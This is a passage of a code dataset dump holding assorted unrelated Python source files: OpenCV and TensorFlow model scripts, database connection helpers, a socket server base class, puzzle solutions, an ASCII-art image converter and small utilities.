reshape_img\r\n\r\n\r\ndef show_single_img():\r\n my_model = keras.models.load_model(model_path)\r\n my_model.summary()\r\n print(\"Successfully Load Model!\")\r\n for file in os.listdir(test_img_path):\r\n img = cv2.imread(os.path.join(test_img_path, file))\r\n print(file)\r\n h, w = img.shape[:2]\r\n cut_img = img[int(0.8 * h):, :]\r\n cut_img = preprocess(cut_img)\r\n input = np.expand_dims(cut_img, 0)\r\n result = my_model.predict(input)\r\n print(result)\r\n cv2.line(img, (0, int(0.8*h)), (w, int(0.8*h)), (255, 0, 0), 2)\r\n cv2.line(img, (0, int(h)-1), (w, int(h)-1), (255, 0, 0), 2)\r\n cv2.line(img, (int(result[0][0] * w), int(0.8 * h)), (int(result[0][3] * w), h), (255, 0, 0), 2)\r\n cv2.line(img, (int(result[0][1] * w), int(0.8 * h)), (int(result[0][2] * w), h), (255, 0, 0), 2)\r\n cv2.namedWindow(\"ttt\", cv2.WINDOW_NORMAL)\r\n cv2.imshow(\"ttt\", img)\r\n cv2.waitKey()\r\n\r\n\r\n# show_single_img()\r\ndef save_img_results():\r\n my_model = keras.models.load_model(model_path)\r\n my_model.summary()\r\n print(\"Successfully Load Model!\")\r\n for file in os.listdir(test_img_path):\r\n img = cv2.imread(os.path.join(test_img_path, file))\r\n print(file)\r\n img = cv2.resize(img, (1920, 1080))\r\n h, w = img.shape[:2]\r\n cut_img = img[int(0.8 * h):, :]\r\n cut_img = preprocess(cut_img)\r\n input = np.expand_dims(cut_img, 0)\r\n result = my_model.predict(input)\r\n print(result)\r\n cv2.line(img, (0, int(0.8*h)), (w, int(0.8*h)), (255, 0, 0), 2)\r\n cv2.line(img, (0, int(h)-1), (w, int(h)-1), (255, 0, 0), 2)\r\n cv2.line(img, (int(result[0][0] * 8), int(0.8 * h)), (int(result[0][3] * 8), h), (255, 0, 0), 2)\r\n cv2.line(img, (int(result[0][1] * 8), int(0.8 * h)), (int(result[0][2] * 8), h), (255, 0, 0), 2)\r\n cv2.imwrite(os.path.join(\"./results_on_src_imgs\", file), img)\r\n\r\nsave_img_results()","sub_path":"Ice_Thickness_Estimation/test_on_src_imgs.py","file_name":"test_on_src_imgs.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"533461893","text":"from core.advbase import *\n\ndef module():\n return Ramona\n\nclass Ramona(Adv):\n conf = {}\n conf['slots.a'] = ['Summer_Paladyns', 'Primal_Crisis']\n conf['acl'] = \"\"\"\n `dragon(c3-s-s-end),s=1 and not s4.check()\n `s3, not buff(s3)\n `s2, s1.check()\n `s4, s=1\n `s1(all)\n \"\"\"\n conf['coabs'] = ['Gala_Sarisse', 'Wand', 'Marth']\n conf['share'] = ['Summer_Patia']\n\n @allow_acl\n def s(self, n, s1_kind=None):\n if n == 1 and s1_kind == 'all':\n self.current_s['s1'] = s1_kind\n else:\n self.current_s['s1'] = 'default'\n return super().s(n)\n\n def s1_do_hit(self, t):\n # reeeeeee fix ur shit cykagames\n with KillerModifier('s1_killer', 'hit', 0.3, ['burn']):\n Selfbuff(f'{t.name}_crit', 0.10, 10, 'crit', 'chance').on()\n self.dmg_make(t.name, 2.93/(1 + self.sub_mod('s', 'buff')))\n self.add_combo(t.name)\n\n def s1_proc(self, e):\n if e.group != 'all':\n return\n for i in range(6):\n t = Timer(self.s1_do_hit)\n t.name = e.name\n t.on(i*0.5+0.5)\n\nif __name__ == '__main__':\n from core.simulate import test_with_argv\n test_with_argv(None, *sys.argv)\n","sub_path":"adv/ramona.py","file_name":"ramona.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"35147700","text":"from .api_settings import MAX_GROUPS\nfrom layer_map.models.catalog import LayerMeta\n\n\ndef add_metadata(obj, current, *args, **kwargs):\n try:\n metadata = obj.metadata.serialize()\n except (obj.DoesNotExist, LayerMeta.DoesNotExist):\n metadata = None\n\n current['metadata'] = metadata\n return current\n\n\ndef alter_id(obj, current, *args, **kwargs):\n current.update({'id': obj.id * MAX_GROUPS,\n 'real_id': obj.id})\n return current","sub_path":"layer_map/modifiers.py","file_name":"modifiers.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"573726993","text":"import re\r\nimport cx_Oracle, sqlite3, sqlalchemy\r\n\r\n\r\ndef format_connection_type(connection_type):\r\n \"\"\"\r\n Formatar entrada de tipo de conexão para uso nas funções de conexão a bancos de dados.\r\n \r\n inputs:\r\n :: connection_type [str ou list/tuple] -> tipo(s) de conexão a ser(em) retornado(s) | [\"connection\" (default), \"cursor\", \"engine\", \"all\"]\r\n\r\n output:\r\n :: [list] -> conexões formatadas para funções de conexão\r\n \"\"\" \r\n\r\n if isinstance(connection_type, str): # caso de ser string\r\n connection_type = connection_type.lower()\r\n if connection_type == 'all':\r\n connection_type = ['cc', 'engine']\r\n elif not connection_type in ['connection', 'cursor', 'engine']:\r\n print(f'invalid connection_type input: {connection_type}')\r\n raise ValueError\r\n else:\r\n connection_type = [connection_type]\r\n\r\n elif isinstance(connection_type, (list, tuple)): # se já for inserido list/tuple\r\n connection_type = list(set(connection_type)) # excluindo duplicatas\r\n\r\n for i, ct in enumerate(connection_type.copy()):\r\n try:\r\n ct = ct.lower()\r\n connection_type[i] = ct\r\n except AttributeError:\r\n print(f'invalid connection_type input: {ct}')\r\n raise ValueError\r\n if ct not in ['connection', 'cursor', 'engine']:\r\n print(f'invalid connection_type input: {ct}')\r\n raise ValueError\r\n\r\n connection_type.sort() \r\n if connection_type[:2] == ['connection', 'cursor']:\r\n connection_type = ['cc'] + connection_type[2:] # cc (connection/cursor) é unificado para garantir que o cursor retornado foi criado a partir da conexão também retornada \r\n \r\n return connection_type\r\n\r\n\r\ndef get_connection_type(connection_type, kwargs):\r\n\r\n if 'connection_type' in kwargs:\r\n connection_type = kwargs.pop('connection_type')\r\n elif not connection_type:\r\n connection_type = 'connection'\r\n elif len(connection_type) == 1:\r\n connection_type = connection_type[0]\r\n connection_type = format_connection_type(connection_type)\r\n return connection_type\r\n\r\n\r\ndef get_db_module_connectortype(sql_connector):\r\n \"\"\"\r\n A partir do objeto conector a banco de dados inserido, retorna-se o banco e o tipo de conexão\r\n\r\n inputs:\r\n :: connector [connector object] -> conector a um banco de dados\r\n\r\n output:\r\n :: [tuple de str] com (db, tipo de conexão) \r\n \"\"\"\r\n\r\n connector_class = re.search(r\"'(.+?)'\", str(type(sql_connector))).group(1).split('.')\r\n module, connector_type = connector_class[0].lower(), connector_class[-1].lower()\r\n if 'oracle' in module:\r\n db = 'oracle'\r\n elif 'sqlite' in module:\r\n db = 'sqlite'\r\n else:\r\n try:\r\n db = re.search(r\"(.+?)://\", str(sql_connector)).group(1).split('(')[1]\r\n except AttributeError:\r\n print(f'Conector inválido: {sql_connector}')\r\n raise\r\n return db, module, connector_type\r\n\r\n try:\r\n a = re.search(r\"^<(.+?) \", str(sql_connector)).group(1).split('.')[0]\r\n except AttributeError:\r\n try:\r\n a = re.search(r\"(.+?)://\", str(sql_connector)).group(1).split('(')[1]\r\n except AttributeError:\r\n print(f'Conector inválido: {sql_connector}')\r\n raise\r\n\r\n\r\ndef get_cursor(sql_connector):\r\n\r\n db, module, connector_type = get_db_module_connectortype(sql_connector)\r\n db, module, connector_type = db.lower(), module.lower(), connector_type.lower() \r\n\r\n implemented = ('cx_oracle', 'sqlite3', 'sqlalchemy')\r\n if module not in implemented:\r\n raise NotImplementedError\r\n if module == 'sqlalchemy':\r\n if connector_type == 'engine':\r\n cursor = sql_connector.connect()\r\n elif connector_type == 'connection':\r\n cursor = sql_connector\r\n else:\r\n if connector_type == 'connection':\r\n cursor = sql_connector.cursor()\r\n elif connector_type == 'cursor':\r\n cursor = sql_connector\r\n return cursor\r\n\r\n\r\ndef format_columns(**kwargs):\r\n\r\n cols_types = kwargs.get('cols_types')\r\n if not cols_types:\r\n cols = kwargs.get('cols', kwargs.get('columns'))\r\n types = kwargs.get('types')\r\n assert cols and types, 'Nomes de colunas (cols) e seus tipos (types) devem ser inseridos'\r\n assert len(cols) == len(types), 'cols e types devem ter o mesmo tamanho'\r\n cols_types = [' '.join(col_typ) for col_typ in zip(cols, types)]\r\n\r\n elif isinstance(cols_types, (list, tuple)):\r\n assert len(cols_types) > 0, 'Lista de colunas e tipos (cols_types) vazia'\r\n if isinstance(cols_types[0], (list, tuple)):\r\n assert len(cols_types[0]) == 2, f'Valor de cols_types[0] inválido: {cols_types[0]}'\r\n cols_types = [f'{col_typ[0]} {col_typ[1]}' for col_typ in cols_types]\r\n elif isinstance(cols_types[0], str):\r\n pass\r\n else:\r\n raise ValueError\r\n\r\n elif isinstance(cols_types, dict):\r\n cols_types = [f'{col} {typ}' for col, typ in cols_types.items()]\r\n \r\n else:\r\n raise ValueError\r\n\r\n return ', '.join([ct.upper() for ct in cols_types])\r\n\r\n\r\ndef get_types_pd2oracle(df, varchar_size=None):\r\n \"\"\"\r\n Helper para a inserção de um pd.DataFrame via cx_Oracle, traduzindo os tipos para\r\n o esperado pelo Oracle\r\n \"\"\"\r\n \r\n types = []\r\n for c, t in df.dtypes.items():\r\n if 'int' in str(t):\r\n types.append('integer')\r\n elif 'float' in str(t):\r\n types.append('float')\r\n elif 'object' in str(t):\r\n types.append(f'varchar({varchar_size if varchar_size else df[c].str.len().max() + 10})')\r\n elif 'date' in str(t):\r\n types.append('date')\r\n else:\r\n types.append(f'varchar({varchar_size if varchar_size else df[c].str.len().max() + 10})')\r\n return types\r\n\r\n\r\ndef list_chunks(lst, chunksize, idx=False):\r\n for i in range(0, len(lst), chunksize):\r\n if not idx:\r\n yield lst[i:i + chunksize]\r\n else:\r\n yield (i, i+chunksize)\r\n\r\n\r\n","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"146532151","text":"\"\"\"\nМодуль описывает базовую логику http сервера\n\"\"\"\n\nimport socket\nfrom interfaces.threaded.i_request_thread import IRequest\nfrom interfaces.threaded.i_response_thread import IResponse\nimport utils\nimport multiprocessing\nfrom datetime import datetime\n\n\nclass IServer:\n \"\"\"\n класс, определяющий базовый функционал для сервера\n \"\"\"\n\n port = None\n server_name = None\n _host = None\n _request = None\n _response = None\n _queue = None\n _process = []\n\n def __init__(self, host_name, port_id, server_name, request, response):\n IServer.port = port_id\n IServer.server_name = server_name\n IServer._host = host_name\n if not (utils.check_type(request, IRequest)):\n raise Exception('объект реквеста не соответствует заданным стандартам IRequest')\n if not (utils.check_type(response, IResponse)):\n raise Exception('объект респонса не соответствует заданным стандартам IResponse')\n IServer._request = request\n IServer._response = response\n # создадим очередь под максимальную нагрузку в 100 запросов\n IServer._queue = multiprocessing.Queue(100)\n\n\n @staticmethod\n def _task_listener(queue: multiprocessing.Queue):\n \"\"\"\n функция ожидающая задачи\n \"\"\"\n\n while True:\n if not queue.empty():\n task, args = queue.get()\n task(args)\n\n def serve_forever(self):\n \"\"\"\n главная функция по обслуживанию клиента\n \"\"\"\n\n serv_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n try:\n serv_sock.bind((self._host, self.port))\n serv_sock.listen()\n\n while True:\n conn, _ = serv_sock.accept()\n IServer._queue.put((IServer._serve_client, conn))\n \n finally:\n serv_sock.close()\n\n @staticmethod\n def _serve_client(conn):\n \"\"\"\n обслуживание запроса(обработка запроса, выполнение запроса, ответ клиенту)\n :param conn: соединение с клиентом\n \"\"\"\n\n try:\n request = IServer._parse_request(conn)\n response = IServer._handle_request(request)\n IServer._send_response(conn, response)\n except ConnectionResetError:\n conn = None\n except Exception as e:\n IServer._send_error(conn, e)\n\n if conn:\n conn.close()\n\n @staticmethod\n def _parse_request(conn):\n \"\"\"\n разбор запроса от клиента\n :param conn:\n :return: объект запроса\n \"\"\"\n raise NotImplementedError\n\n @staticmethod\n def _handle_request(request):\n \"\"\"\n обработка запроса от клиента\n :return: данные для клиента\n \"\"\"\n raise NotImplementedError\n\n @staticmethod\n def _send_response(conn, response):\n \"\"\"\n Отправка ответа клиенту\n :param conn: сокет\n \"\"\"\n raise NotImplementedError\n\n @staticmethod\n def _send_error(conn, err):\n \"\"\"\n конструирование объекта ошибки и его отправка\n :param conn: сокет\n :param err: ошибка\n \"\"\"\n raise NotImplementedError\n","sub_path":"interfaces/multiprocessing/i_server.py","file_name":"i_server.py","file_ext":"py","file_size_in_byte":3705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"151811776","text":"def main():\n buses = inputAsList()[1].split(',')\n busTuples = []\n for i in range(len(buses)):\n if(buses[i] != 'x'):\n busTuples.append((int(buses[i]),i))\n increments = int(buses[0])\n alignedBuses = 1\n depTime = int(buses[0])\n while alignedBuses != len(busTuples):\n depTime += increments\n if((depTime+busTuples[alignedBuses][1])%busTuples[alignedBuses][0] == 0):\n increments *= int(busTuples[alignedBuses][0])\n alignedBuses+=1\n return depTime\n\ndef inputAsList():\n f = open('input')\n return f.read().splitlines()\n\nprint(\"Part 2: \" + str(main()))","sub_path":"day13/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"286562864","text":"#!/usr/bin/env python\n# coding:utf-8\n\nfrom PIL import Image\nimport argparse\n\n\n# 设置字符个数\nascii_char = list(\"$@B%8&WM#*oahkbdpqwmZO0QLCJUYXzcvunxrjft/\\|()1{}[]?-_+~<>i!lI;:,\\\"^`'. \")\n\n\n# 参数设置\ndef set_args():\n # 设置参数输入格式\n parser = argparse.ArgumentParser(description=\"some information here\")\n parser.add_argument('file')\n parser.add_argument('--output', type=str, default='output.txt')\n parser.add_argument('--width', type=int, default=160)\n parser.add_argument('--high', type=int, default=60)\n\n # 获取参数\n args = parser.parse_args()\n file = args.file\n output = args.output\n width = args.width\n high = args.high\n return file, output, width, high\n\n\n# RGB值转字符的函数,将256灰度映射到70个字符上\ndef get_char(r, g, b, alpha=256):\n if alpha == 0:\n return ' '\n length = len(ascii_char)\n gray = int(0.2126*r + 0.7152*g + 0.0722*b)\n unit = (256.0+1)/length\n return ascii_char[int(gray/unit)]\n\n\n# 主函数\ndef img2charset(file, output, width, high):\n txt = \"\"\n im = Image.open(file)\n im = im.resize((width, high), Image.NEAREST)\n\n for h in range(high):\n for w in range(width):\n txt += get_char(*im.getpixel((w, h)))\n txt += '\\n'\n print(txt)\n\n with open(output, 'w') as f:\n f.write(txt)\n\n\nif __name__ == '__main__':\n img2charset(*set_args())\n","sub_path":"porject/Python图片转字符画/img2charset.py","file_name":"img2charset.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"324025064","text":"import sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10**7)\ninf = 10**17\nmod = 10**9+7\n\nk, x = map(int, input().split())\n\nif k * 500 >= x: print(\"Yes\")\nelse: print(\"No\")\n","sub_path":"atcorder/abc150/a/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"450775196","text":"# Copyright 2021 BlobCity, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom blobcity.store import DictClass\nfrom blobcity.utils import getDataFrameType,dataCleaner\nfrom blobcity.utils import AutoFeatureSelection as AFS\nfrom blobcity.main.modelSelection import model_search\nfrom blobcity.code_gen import yml_reader,code_generator\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.feature_selection import SelectKBest,f_regression,f_classif\ndef train(file=None, df=None, target=None,features=None,accuracy_criteria=0.99):\n \"\"\"\n param1: string: dataset file path \n\n param2: (optional) pandas.DataFrame object\n\n param3: string: target/dependent column name.\n\n param4: float: range[0.1,1.0] \n\n return: Model Class Object\n Performs a model search on the data proivded. A yaml file is generated once the best fit model configuration\n is discovered. The yaml file is later used for generating source code. \n\n Input to the function must be one of file or data frame (df). Passing both parameters of file and df in a single\n invocation is an incorrect use.\n \"\"\"\n dict_class=DictClass()\n dict_class.resetVar()\n #data read\n if file!=None:\n dataframe= getDataFrameType(file, dict_class)\n else: \n dataframe = df\n dict_class.addKeyValue('data_read',{\"type\":\"df\",\"class\":\"df\"})\n \n if(features==None):\n featureList=AFS.FeatureSelection(dataframe,target,dict_class)\n CleanedDF=dataCleaner(dataframe,featureList,target,dict_class)\n else:\n CleanedDF=dataCleaner(dataframe,features,target,dict_class)\n #model search space\n accuracy_criteria= accuracy_criteria if accuracy_criteria<=1.0 else (accuracy_criteria/100)\n modelClass = model_search(CleanedDF,target,dict_class,use_neural=False,accuracy_criteria=accuracy_criteria)\n modelClass.yamldata=dict_class.getdict()\n modelClass.feature_importance_=dict_class.feature_importance if(features==None) else calculate_feature_importance(CleanedDF.drop(target,axis=1),CleanedDF[target],dict_class)\n dict_class.resetVar()\n return modelClass\n\ndef load(modelFile,h5_path=None):\n \"\"\"\n param1: string: (required) the filepath to the stored model. Supports .pkl models.\n param2: string: the filepath to the stored h5 file, provide only if saved h5 file.\n returns: Model file\n\n function loads the serialized model from .pkl or .h5 format to usable format.\n \"\"\"\n path_components = modelFile.split('.')\n extension = path_components[1] if len(path_components)<=2 else path_components[2]\n \n if extension == 'pkl' and h5_path in [None,\"\"]:\n model = pickle.load(open(modelFile, 'rb'))\n\n \"\"\" elif os.path.splitext(h5_path)[1] == '.h5' and h5_path!=None:\n print(\"pkl path: {}, h5 path : {}\".format(os.path.splitext(modelFile),os.path.splitext(h5_path)))\n if os.path.splitext(h5_path)[0] == os.path.splitext(modelFile)[0]:\n tfmodel = tf.keras.models.load_model(h5_path)\n model=pickle.load(open(modelFile, 'rb'))\n model.model=tfmodel\n else:\n raise ValueError(\"file name for pickle and h5 file should be same\") \"\"\"\n return model\n\ndef spill(filepath,yaml_path=None,doc=None):\n \"\"\"\n param1:string : filepath and format of generated file to store. either .py or .ipynb\n param2:string : filepath of already generated YAML file \n param3:boolean : whether generate code along with documentation\n\n Function calls generator functions to generate source code for the AutoAI Procedure\n \"\"\"\n if yaml_path in [None,\"\"] : raise TypeError(\"YAML file path can't be None\")\n data=yml_reader(yaml_path)\n code_generator(data,filepath,doc)\n\ndef calculate_feature_importance(X,Y,dict_class):\n if X.shape[1]>2:\n score_func=f_classif if(dict_class.getdict()['problem'][\"type\"]=='Classification') else f_regression\n fit = SelectKBest(score_func=score_func, k=X.shape[1]).fit(X,Y)\n dfscores,dfcolumns = pd.DataFrame(fit.scores_),pd.DataFrame(X.columns)\n df = pd.concat([dfcolumns,dfscores],axis=1)\n df.columns = ['features','Score']\n df['Score']=MinMaxScaler().fit_transform(np.array(df['Score']).reshape(-1,1))\n imp=AFS.MainScore(dict(df.values),dict_class)\n return imp\n else:\n print('Dataset has only {} features, required atleast 2 for feature importances'.format(X.shape[1]))\n return None\n\n","sub_path":"blobcity/main/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":5060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"379018886","text":"import logging\nimport checker\nimport listener\n\n\nclass Detector(object):\n \"\"\"The detector class is the first layer where security alerts are being sent to analysis\"\"\"\n\n def __init__(self, init_checker):\n self._init_checker = init_checker\n self._default_subnet = \"10.0.0.0/24\"\n super(Detector, self).__init__()\n\n def start_detector(self):\n logging.info(\"Starting init detector\")\n self._init_checker.is_in_domain()\n self._init_checker.is_connected_to_internet()\n self._init_checker.get_all_usb_devices()\n self._init_checker.get_network_interfaces()\n\n @staticmethod\n def create_new_network_checker(network_subnet):\n logging.info(\"Creating new checker instance to scan network\")\n network_checker = checker.Checker(network_subnet)\n network_checker.devices_in_subnet()\n\n def create_new_listener(self):\n new_listener = listener.Listener(self._default_subnet)\n new_listener.start_mouse_listener()\n\n","sub_path":"detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"264124347","text":"import cv2\nimport numpy as np\nimport argparse\n\ndef shape_detector(args: argparse.Namespace):\n img = cv2.imread(args.image)\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n \n _, thresh = cv2.threshold(img_gray, 240, 255, cv2.THRESH_BINARY)\n contours, _ = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n\n white = np.ones((img.shape[0], img.shape[1], 3))\n\n for c in contours:\n approx = cv2.approxPolyDP(c, 0.01*cv2.arcLength(c, True), True)\n cv2.drawContours(img, [approx], 0, (0, 255, 0), 5)\n x = approx.ravel()[0]\n y = approx.ravel()[1] - 5\n if len(approx) == 3:\n cv2.putText(img, \"Triangle\", (x, y),\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), 1)\n elif len(approx) == 4:\n x1, y1, w, h = cv2.boundingRect(approx)\n aspect_ratio = float(w) / float(h)\n print(aspect_ratio)\n if aspect_ratio >= 0.95 and aspect_ratio <= 1.05:\n cv2.putText(img, \"Square\", (x, y),\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), 1)\n else:\n cv2.putText(img, \"Rectangle\", (x, y),\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), 1)\n elif len(approx) == 5:\n cv2.putText(img, \"Pentagon\", (x, y),\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), 1)\n elif len(approx) == 10:\n cv2.putText(img, \"Star\", (x, y),\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), 1)\n else:\n cv2.putText(img, \"Circle\", (x, y),\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), 1)\n\n cv2.imshow(\"Shapes\", img)\n cv2.waitKey()\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--image\", default=\"\", type=str, help=\"Image file\")\n args = parser.parse_args()\n shape_detector(args)\n","sub_path":"Day 7/shape_recognition/shape_reconition.py","file_name":"shape_reconition.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"615659630","text":"# -*- coding: utf-8 -*-\r\n# /usr/bin/python2\r\n'''\r\n2019-04-10 by zhangshuyuan.\r\n'''\r\n\r\nimport tensorflow as tf\r\nimport datetime\r\n\r\nclass ModelBase():\r\n def __init__(self,type):\r\n self.__type = type\r\n\r\n def predict(self,sentence):\r\n return sentence\r\n\r\n def batch_predict(self,sentences):\r\n return sentences\r\n\r\nclass CorrectModel(ModelBase):\r\n def __init__(self,type,model_path,input_len,output_len,batch_size):\r\n ModelBase.__init__(self,type)\r\n self.__batch_size = batch_size\r\n self.__path = model_path\r\n self.__vocab_file = '/bpe.vocab'\r\n word2idx,idx2word = self.__load_vocab(model_path+self.__vocab_file)\r\n self.__word2idx = word2idx\r\n self.__idx2word = idx2word\r\n self._input_len = input_len\r\n self._output_len = output_len\r\n #加载模型\r\n ##加载多个模型并同时运行有可能导致内存爆掉\r\n self.__graph=tf.Graph()\r\n sess = tf.Session(graph=self.__graph)\r\n self.__sess = sess\r\n with self.__graph.as_default():\r\n ## Restore parameters and session\r\n restore_saver = tf.train.import_meta_graph(model_path+'/model.meta')\r\n restore_saver.restore(sess, tf.train.latest_checkpoint(model_path))\r\n self.__preds = tf.get_default_graph().get_tensor_by_name(\"predict_y:0\")\r\n self.__x = tf.get_default_graph().get_tensor_by_name(\"input_x:0\")\r\n\r\n def __padding(self,sentence):\r\n if len(sentence)>self._input_len-1:\r\n sentence =sentence[0:self._input_len-1]\r\n sentence.append(3) #\r\n else:\r\n sentence.append(3)\r\n if len(sentence)\")[0].strip()\r\n result.append(got)\r\n return result\r\n\r\n def predict(self,sentence):\r\n sentence = [sentence]\r\n sentence = self.batch_predict(sentence)\r\n return sentence[0]\r\n\r\n def batch_predict(self,sentences):\r\n batch_size = self.__batch_size\r\n X = self.__prepro(sentences)\r\n batch_num = len(sentences)//batch_size\r\n left_num = len(sentences)%batch_size\r\n results = []\r\n for i in range(batch_num):\r\n x_ = X[i*batch_size:(i+1)*batch_size]\r\n x_ = self.__common_predict(x_)\r\n results.extend(x_)\r\n if left_num > 0:\r\n x_ = X[batch_num * batch_size:len(sentences)]\r\n x_ = self.__common_predict(x_)\r\n results.extend(x_)\r\n return results\r\n\r\n def __load_vocab(self,vocab_fpath):\r\n '''Loads vocabulary file and returns idx<->token maps\r\n vocab_fpath: string. vocabulary file path.\r\n Note that these are reserved\r\n 0: , 1: , 2: , 3: \r\n Returns\r\n two dictionaries.\r\n '''\r\n vocab = [line.split('=&=')[0] for line in open(vocab_fpath, 'r', encoding='utf-8').read().splitlines()]\r\n token2idx = {token: idx for idx, token in enumerate(vocab)}\r\n idx2token = {idx: token for idx, token in enumerate(vocab)}\r\n return token2idx, idx2token\r\n\r\ndef get_standard_time():\r\n return datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S.%f\")\r\n\r\nif __name__ == '__main__':\r\n cm = CorrectModel('company','logdir/',112,27,16)\r\n print(get_standard_time())\r\n oo = cm.predict('hello world')\r\n print(get_standard_time())\r\n oo = cm.predict('hello world')\r\n print(get_standard_time())\r\n oo = cm.predict('hello world')\r\n print(get_standard_time())\r\n\r\n batchs = ['sdfsadfsadfasfdfsadf','dfasdfasdfsadf','dfsadfsadfsdsadf','fasfefefevevefef','effverthhjthth','iukuikyjrtheh']\r\n print(oo)\r\n\r\n print(get_standard_time())\r\n oo = cm.batch_predict(batchs)\r\n print(get_standard_time())\r\n print(get_standard_time())\r\n oo = cm.batch_predict(batchs)\r\n print(get_standard_time())\r\n print(get_standard_time())\r\n oo = cm.batch_predict(batchs)\r\n print(get_standard_time())\r\n print(get_standard_time())\r\n oo = cm.batch_predict(batchs)\r\n print(get_standard_time())\r\n print(get_standard_time())\r\n oo = cm.batch_predict(batchs)\r\n print(get_standard_time())\r\n\r\n import time\r\n time.sleep(10)\r\n print(\"Done\")\r\n\r\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"368789744","text":"from pytest import raises\n\nfrom xii import cli\nfrom xii.extension import ExtensionManager\n\n# test ext_mgr\next_mgr = ExtensionManager()\next_mgr.add_builtin_path()\next_mgr.load()\n\n\nclass FakeRegisterAvailable():\n def __init__(self, commands):\n self._commands = commands\n\n def available(self):\n return self._commands\n\n\ndef test_usage_text():\n result = cli.usage_text(ext_mgr)\n\n assert(\"xii [OPTIONS]\" in result)\n assert(\"Commands available:\" in result)\n assert(\"d destroy\" in result)\n assert(\"s start\" in result)\n\n\ndef test_cli_arg_parser():\n parser = cli.cli_arg_parser(ext_mgr)\n\n result = parser.parse_args([\n \"--no-parallel\",\n \"--deffile\", \"/tmp/xii/config\",\n \"-Dtest=true\", \"-D\", \"foo=bar\",\n \"start\",\n \"foo\"\n ])\n\n assert(result.parallel is False)\n assert(result.deffile == \"/tmp/xii/config\")\n assert(result.defines == [\"test=true\", \"foo=bar\"])\n assert(result.command == \"start\")\n assert(result.command_args == [\"foo\"])\n\n\n\ndef test_run_cli(monkeypatch, capsys):\n pass\n","sub_path":"tests/unit/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"358993184","text":"import os\nimport re\n\n\ndef ex4(xml_path, d):\n res = []\n xml_content = open(os.path.join(os.getcwd(), xml_path), 'r').read()\n r = r'<\\s*\\w+\\s+'\n for key in d:\n r += r'(' + key + r'\\s+=\\s+\"' + d[key] + r')*' + r'.+'\n r += r'>.+'\n r = re.compile(r)\n for line in xml_content.split('\\n'):\n if r.match(line):\n res.append(line)\n return res\n\n\nd = {\n \"class\": \"url\",\n \"name\": \"url\",\n \"date-id\": \"item\"\n}\nprint(ex4('xml_file.xml', d))\n","sub_path":"an3/python/lab11/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"330122080","text":"import sys\n\nmoney = {\n\t1: 'PENNY',\n\t5: 'NICKEL',\n\t10: 'DIME',\n\t25: 'QUARTER',\n\t50: 'HALF DOLLAR',\n\t100: 'ONE',\n\t200: 'TWO',\n\t500: 'FIVE',\n\t1000: 'TEN',\n\t2000: 'TWENTY',\n\t5000: 'FIFTY',\n\t10000: 'ONE HUNDRED'\n}\n\ndef main():\n\twith open(sys.argv[1]) as f:\n\t\tfor line in f:\n\t\t\tif line.strip():\n\t\t\t\tpp, ch = [int(i * 100) for i in map(float, line.split(';'))]\n\t\t\t\tresult = []\n\t\t\t\tif pp == ch:\n\t\t\t\t\tprint(\"ZERO\")\n\t\t\t\telif ch < 